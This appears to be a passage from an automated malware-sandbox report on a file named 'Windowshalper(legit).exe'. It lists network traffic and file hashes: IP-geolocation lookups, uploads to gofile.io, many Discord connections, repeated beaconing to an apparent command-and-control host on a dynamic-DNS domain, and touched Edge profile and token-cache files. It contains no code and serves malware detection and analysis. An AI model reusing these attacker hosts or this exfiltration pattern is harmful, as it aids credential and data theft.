C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:443 api.ipify.org tcp
US 8.8.8.8:53 api.gofile.io udp
FR 51.38.43.18:443 api.gofile.io tcp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
US 8.8.8.8:53 205.13.26.104.in-addr.arpa udp
US 8.8.8.8:53 18.43.38.51.in-addr.arpa udp
US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
US 8.8.8.8:53 store10.gofile.io udp
FR 31.14.70.252:443 store10.gofile.io tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 252.70.14.31.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 171.101.63.23.in-addr.arpa udp
US 8.8.8.8:53 233.128.159.162.in-addr.arpa udp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
FR 31.14.70.252:443 store10.gofile.io tcp
FR 31.14.70.252:443 store10.gofile.io tcp
FR 31.14.70.252:443 store10.gofile.io tcp
FR 31.14.70.252:443 store10.gofile.io tcp
FR 31.14.70.252:443 store10.gofile.io tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 kackrock.ddns.net udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
US 104.26.13.205:443 api.ipify.org tcp
FR 51.38.43.18:443 api.gofile.io tcp
DE 159.89.102.253:443 geolocation-db.com tcp
US 8.8.8.8:53 store2.gofile.io udp
FR 45.112.123.239:443 store2.gofile.io tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
FR 45.112.123.239:443 store2.gofile.io tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 239.123.112.45.in-addr.arpa udp
FR 45.112.123.239:443 store2.gofile.io tcp
FR 45.112.123.239:443 store2.gofile.io tcp
FR 45.112.123.239:443 store2.gofile.io tcp
FR 45.112.123.239:443 store2.gofile.io tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com udp
N/A 224.0.0.251:5353 udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 r.bing.com udp
NL 23.62.61.97:443 r.bing.com tcp
NL 23.62.61.194:443 r.bing.com tcp
NL 23.62.61.194:443 r.bing.com tcp
NL 23.62.61.97:443 r.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
NL 23.62.61.194:443 r.bing.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
NL 40.126.32.138:443 login.microsoftonline.com tcp
US 8.8.8.8:53 services.bingapis.com udp
US 13.107.5.80:443 services.bingapis.com tcp
US 8.8.8.8:53 80.5.107.13.in-addr.arpa udp
US 8.8.8.8:53 167.154.64.172.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
DE 140.82.121.3:443 github.com tcp
DE 140.82.121.3:443 github.com tcp
US 8.8.8.8:53 3.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 8.8.8.8:53 154.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 api.github.com udp
DE 140.82.121.5:443 api.github.com tcp
US 8.8.8.8:53 collector.github.com udp
US 140.82.113.21:443 collector.github.com tcp
US 140.82.113.21:443 collector.github.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 140.82.113.21:443 collector.github.com tcp
US 8.8.8.8:53 5.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 21.113.82.140.in-addr.arpa udp
US 8.8.8.8:53 codeload.github.com udp
DE 140.82.121.9:443 codeload.github.com tcp
US 8.8.8.8:53 9.121.82.140.in-addr.arpa udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 kackrock.ddns.net udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
US 2.17.251.10:443 aefd.nelreports.net tcp
US 2.17.251.10:443 aefd.nelreports.net udp
US 8.8.8.8:53 10.251.17.2.in-addr.arpa udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
US 8.8.8.8:53 kackrock.ddns.net udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
US 8.8.8.8:53 gstatic.com udp
DE 142.250.186.99:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 99.186.250.142.in-addr.arpa udp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DE 142.250.186.99:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
US 162.159.128.233:443 discord.com tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
NL 23.62.61.194:443 www.bing.com udp
US 8.8.8.8:53 67.112.168.52.in-addr.arpa udp
US 8.8.8.8:53 kackrock.ddns.net udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.130.159.162.in-addr.arpa udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DE 142.250.186.99:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 232.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 kackrock.ddns.net udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
US 8.8.8.8:53 84.242.123.52.in-addr.arpa udp
NL 23.62.61.155:443 www.bing.com udp
US 8.8.8.8:53 155.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
NL 23.62.61.97:443 th.bing.com udp
NL 23.62.61.194:443 th.bing.com udp
US 8.8.8.8:53 aefd.nelreports.net udp
US 2.17.251.10:443 aefd.nelreports.net udp
US 2.17.251.10:443 aefd.nelreports.net tcp
US 104.18.33.89:443 www2.bing.com udp
US 8.8.8.8:53 89.33.18.104.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 154.173.246.72.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 cracked.io udp
US 104.18.1.137:443 cracked.io tcp
US 104.18.1.137:443 cracked.io tcp
US 8.8.8.8:53 static.cracked.io udp
US 104.18.1.137:443 static.cracked.io udp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
US 8.8.8.8:53 external-content.duckduckgo.com udp
IE 52.142.125.222:443 external-content.duckduckgo.com tcp
IE 52.142.125.222:443 external-content.duckduckgo.com tcp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
US 8.8.8.8:53 137.1.18.104.in-addr.arpa udp
US 8.8.8.8:53 202.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 14.25.17.104.in-addr.arpa udp
US 8.8.8.8:53 227.185.250.142.in-addr.arpa udp
US 8.8.8.8:53 222.125.142.52.in-addr.arpa udp
US 104.17.25.14:443 cdnjs.cloudflare.com udp
US 8.8.8.8:53 static.cracked.to udp
US 172.67.73.245:443 static.cracked.to tcp
US 172.67.73.245:443 static.cracked.to tcp
US 172.67.73.245:443 static.cracked.to tcp
US 172.67.73.245:443 static.cracked.to tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 23.63.101.170:80 apps.identrust.com tcp
US 8.8.8.8:53 245.73.67.172.in-addr.arpa udp
US 8.8.8.8:53 170.101.63.23.in-addr.arpa udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
NL 23.62.61.97:443 th.bing.com udp
US 104.17.25.14:443 cdnjs.cloudflare.com udp
US 8.8.8.8:53 kackrock.ddns.net udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
US 8.8.8.8:53 kackrock.ddns.net udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
US 8.8.8.8:53 kackrock.ddns.net udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
US 8.8.8.8:53 kackrock.ddns.net udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
US 8.8.8.8:53 kackrock.ddns.net udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
US 8.8.8.8:53 kackrock.ddns.net udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
US 8.8.8.8:53 kackrock.ddns.net udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
US 8.8.8.8:53 kackrock.ddns.net udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
US 8.8.8.8:53 kackrock.ddns.net udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
US 8.8.8.8:53 kackrock.ddns.net udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
US 8.8.8.8:53 kackrock.ddns.net udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
US 8.8.8.8:53 kackrock.ddns.net udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
US 8.8.8.8:53 kackrock.ddns.net udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
US 8.8.8.8:53 kackrock.ddns.net udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
US 8.8.8.8:53 kackrock.ddns.net udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
US 8.8.8.8:53 kackrock.ddns.net udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
DK 62.199.104.190:5656 kackrock.ddns.net tcp
US 8.8.8.8:53 kackrock.ddns.net udp
DK 62.199.104.190:5656 kackrock.ddns.net tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 4d6e17218d9a99976d1a14c6f6944c96
SHA1 9e54a19d6c61d99ac8759c5f07b2f0d5faab447f
SHA256 32e343d2794af8bc6f2f7c905b5df11d53db4ad8922b92ad5e7cc9c856509d93
SHA512 3fa166b3e2d1236298d8dda7071a6fcf2bde283f181b8b0a07c0bb8ba756d6f55fa8a847ca5286d4dbabc6dace67e842a118866320ac01bd5f93cccd3a032e47

\??\pipe\LOCAL\crashpad_3388_TPEOWHQNVAVQUQGG

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 48538527c85e50f6c28716c799a21a6b
SHA1 b96fa85695e209ff5c9f2886895f976c5c713e8a
SHA256 fe7a8f294861af20aa58f7b2a99fb940ce8902593b7807c9333e170a250495fa
SHA512 ece85c15fb156b64a8ddafeb0f84d41c53f14464ac3050b2f8a88f42315fb2d5f5284608348e8c4d080f0952c4ad50924298ad14e6f8d54d55dead6212c7f63b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 1d5a706389d8b79b892a6d61ea71cbb2
SHA1 8da031fbacbe7bb590d64d502256dc4fc1243f65
SHA256 d14efc85cf884154cf5784e8cc731d6d9dbe62f6b0ce3396fe0ec6a9b221e486
SHA512 a07c3fb36ae3031316177b265184649182ea4dd81f0b04c0d6fa2cc9c910a4d9550da9725d857f46713875cd6ba76ef6da9cfde716f8fb22d75bf848fc9c7425

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 1c7ec27d94da04714401b9adf0b17756
SHA1 3e18d51664cd7c8036552c1557391ae0e7d3363d
SHA256 57be391e5772faf9845cc18c3b6c5e428c1181feaa56c5dd4c4d16472c9ebb52
SHA512 067ce3414a4fdadf8b1fbc79cd0abfdbde43e60b848d9f06e1310f3c1192ab2135347d570baa9c1eee1da941f70e66a85ff4a82fcd6286268c542c97a5f2ba24

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 b4779af6108a1986cb05f9c1bad4dff8
SHA1 802569ffcb98c3f1451b10afdb5dc0eda7ca4876
SHA256 a65e6a17d98579bb45f679753970fdc68bf2ffab4790ab3846638b45be24c1b9
SHA512 45fa024f5f552e19b5b6343b3598017e685713796de18ad0d9b425754ea7ef0931d172bac8190c79f0b9d3e7db8dd9f4becd8276947f63e50f1ae6a91bf1827e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f85b3b4fec7770d9f4d18af36fc21b55
SHA1 ca964fc1e0273a6b6f6fc07593be767ab3756c3c
SHA256 89f8748bd1e6a2eb5e95d41795bf5ccb6af8274dade8d40641a7e7b1640d9809
SHA512 f2a31149244e3900c290abab830631b75bf4ea0b6ee4374e938a2140c7507345031062d154e6a6a008d0046830f8ce692c2293e87ec1dfc9bfdb2435d2a03fc6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

MD5 13c486874e12c1813416cf2084f9bd3d
SHA1 4ff0a07f889e5f06ffb31c6881126a4631b7ab2e
SHA256 f60e63a448f3cc182588d6282469fd977d0565aac97f7f81d219cd32b2d840ad
SHA512 2aaceea8ea19ca5ba959de18f9e91e6a557f31c4a4185518c6f7bedd6807bf2b2275c79d7340216f61bf839fe04c4844d153cd732f563fa0c2a0598b8c6d4c01

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

MD5 2e7b1044974319155f7772a9d2b0510e
SHA1 f603cd4fee3bf8d8279fd3406f57689f22c94e7c
SHA256 2a292da5c673d293f33827224bc50a504d1bcdf28d8a981c818c9ac7bdbb86ab
SHA512 58202bdd00f34a98f334dc7d928dcf44ae78b8aaf5a034f2812fd70965d3124c7ce7ea83df5ce717ec0313dccf780497ead67825afd2285bf00757e03c155ab9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

MD5 ee275ec30ba97dc8fcb7641a37b72329
SHA1 a8d20b8d545040fe149c2730578582d1287d7b55
SHA256 feba7a03b4abce4a78910290c26bcc824d9b4df8dbb7e47a4350f4462347f7ee
SHA512 0f835d59918e69aec8a46c22f37a16222d8ffd5ee126cc3aa9b0b69dbc435741f210fb9f5f0ac12bec0a821cc5adbed1d51810c34b247e8779830e8b9822c673

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6f379c41d7d0ac5ea5f113a62fee4a42
SHA1 4aa008447f3cf0f3fda55cbb64a579761413a3e9
SHA256 f25f6edb13388e793f0d9cd377a86462072125e77569216bcb2d40dc7f4cc2d7
SHA512 08b6b62d24999c7f0aa01e90e7b87a747044df089995a0bd6366d5874b2e4b8687e9c7ec893d45257a7a3b5848413682ce2cc1bdae93e69c1f61a313d5a454f8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache

MD5 a9851aa4c3c8af2d1bd8834201b2ba51
SHA1 fa95986f7ebfac4aab3b261d3ed0a21b142e91fc
SHA256 e708be5e34097c8b4b6ecb50ead7705843d0dc4b0779b95ef57073d80f36c191
SHA512 41a1b4d650ff55b164f3db02c8440f044c4ec31d8ddbbbf56195d4e27473c6b1379dfad3581e16429650e2364791f5c19aae723efc11986bb986ef262538b818

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13357011505904057

MD5 9a1cc409b6ef8c15f78caa8fb564742d
SHA1 f006f75b14da84382e250584f036d6b7b0d4d766
SHA256 5cbe754e2209aeac04a77e367981e547cfc32e49428b2b588499d2449d0877ed
SHA512 ed65fe1900d9107490019b947d32bbfd187da3576e66822c5f71362eba7ea6d2f4ad0098ed8631ee245b2736183e5f92f2fea456bd1977389d743bfd13a4c473

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

MD5 838a7b32aefb618130392bc7d006aa2e
SHA1 5159e0f18c9e68f0e75e2239875aa994847b8290
SHA256 ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA512 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

MD5 9927fa5ce3f0517f5bdec824130a434a
SHA1 2d42d0aa78f433b6b3c1134e4781925a65175498
SHA256 d309ccd2ff7883ec6c7873947dfd9ed900ddf8b4cbd78b5328a7ed81aee44ffa
SHA512 aa1d7da57eca64a482533529b12bd9d901eb0447dd5d22450612d822e3d703481e1629fe30f67ba324056b5dba2f2da26577c8538b719a934ba65eeb9c7fd80a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

MD5 ba92e5bbca79ea378c3376187ae43eae
SHA1 f0947098577f6d0fe07422acbe3d71510289e2fc
SHA256 ccf4c13cd2433fe8a7add616c7d8e6b384cf441e4d948de5c6fc73e9315c619f
SHA512 aa1d8b7eb9add6c5ed5635295f501f950914affc3fa9aa1ee58167ed110f99a1760b05e4efb779df8e432eab1b2a0fc9cf9d67a05b2d5432ff8f82c620a38a62

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

MD5 be1eb628acf34e97f4533dad64ffa2fb
SHA1 39f9135d32b1533e566e3713d5988e4a8d318ebb
SHA256 b9cb7b4e8b60ef2d17d405d4c28eae116491c54a300c7c2eff41ee951f9ad496
SHA512 33ede826d333ce01cac7a87c177ea4752bd5ec9f2826fe27b380383781fdfc52fe1bff7ae5cf7741500114338d0623326173b94b9bc7f2a83aed0ea093b75c7d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

MD5 cf934811d13766a9223b08f43e045782
SHA1 710ae48150efb574d0614abf54e1d06acda5d81b
SHA256 d0b23ecf4378d3594d1e2d9261d42a9deccd79779dcede3d58e5d014715023c8
SHA512 41a3b1a71e7b2ff35e0ca663db1279edf0f56b215d5d8e8b320539b8c9b9b53e06981741b662857172db619801cb81ee516335a44897abf4a4df6a9efc7bc0ec

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

MD5 e2d22a1eb3920b6e344aa0d3542d9905
SHA1 520f99fc83cdc576330ac8c4cf711af9e228276b
SHA256 f2c18da53cc6fc8fcb3100135184d2a702a7b009cc6decda8d3de41f68a8c3e7
SHA512 c749f476664662e6ba41d00a125b93e8cf755c920fb2ce28d22d01beca24d3c1678d1bd42a958206784ad13c13a41e97527dfc0d53fbf54f0b1dd7130dbb4eed

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

MD5 8ffcc8e60ffbb1e3c0338918820402e4
SHA1 1c9f545e1174ec107ef10731bc3db90ca76e61dd
SHA256 c70e48916720e103ccca4e8f532ffec38c2b860ab47be4f272aa0378da09c8f7
SHA512 8885152591ce3d0f54acad8600e199dda56da72e9a8b46d3302d3889fe6889ccfc4ff0f4bb2c4769857e3d09c3c485e3227ace8aa2d1b394ee291cfed5f6861a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 43076cf1e2e34e9d6efc2b176831a2a9
SHA1 fdf0f8e37c4e5ba28fd55e5caf94412d4c289b22
SHA256 e25148ab882675222ee2fc74163b611c5ec112e7f538c9c002bf8af1a76adcaf
SHA512 ec322fe93277aeeeff5a4801a0321e80f00e996e90357903d647ea26d72721fd2c17075f4caa78767a2f4770689a6774b3da2fcf7a620ac2cc25b2e1a6ba8417

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

MD5 bb45a89131c05d7f9303c6da5796d3ba
SHA1 581963e46b0629665bfbeb082878f89775a9194d
SHA256 562a23468ebbbb83c7af740257ce43819248593a4d34b5ad60938b91043bcbd5
SHA512 61e51b3c3178d061ff6825d57b9421cdfcc62c6b2b74f42d499dcb1122ab6a9ae6aa296a69906cd999ce4e65832fe0ca4cd4756b41996d7de38b60022ced4c5b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

MD5 6a358000e540484505ef1be10de0614d
SHA1 e2428435ae397ab9334ece4fcc9efc73f694f55a
SHA256 318ac07b9305c2092d2b825a748b810f327267c12b3b7c739796201651f070f1
SHA512 344e322a3ab28374794f13883fbcb593321e4c087f495d9e1e51344b18eb97f1885414461129d3e45618e4db26b54b90b8ad1a051dfe562158cf463363cb3889

C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres

